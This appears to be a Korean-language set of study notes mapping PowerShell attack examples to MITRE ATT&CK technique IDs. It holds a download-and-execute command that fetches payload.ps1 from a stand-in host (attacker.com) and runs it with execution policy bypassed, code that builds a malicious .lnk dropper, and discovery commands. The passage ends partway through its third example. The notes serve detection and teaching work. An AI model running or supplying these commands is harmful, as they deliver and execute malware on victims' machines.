예시 1 — PowerShell로 원격 파일 다운로드
# 원격 파일 다운로드 후 실행
Invoke-WebRequest -Uri "<http://attacker.com/payload.ps1>" -OutFile "$env:TEMP\\payload.ps1"
Start-Process powershell -ArgumentList "-ExecutionPolicy Bypass -File $env:TEMP\\payload.ps1"
매핑
행위 | 전술(Tactic) | Technique ID | 기술명 |
---|---|---|---|
PowerShell 명령 실행 | Execution | T1059.001 | Command and Scripting Interpreter: PowerShell |
원격 리소스 다운로드 | Command & Control | T1105 | Ingress Tool Transfer |
예시 2 — .lnk 드로퍼 생성
# 악성 바로가기 생성
$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("$env:USERPROFILE\\Desktop\\evil.lnk")
$Shortcut.TargetPath = "powershell.exe"
$Shortcut.Arguments = "-ExecutionPolicy Bypass -File C:\\payload.ps1"
$Shortcut.Save()
매핑
위 | 전술 | Technique ID | 기술명 |
---|---|---|---|
악성 .lnk 파일 생성 | Initial Access | T1204.002 | User Execution: Malicious File |
예시 3 — 시스템 정보 수집
whoami
hostname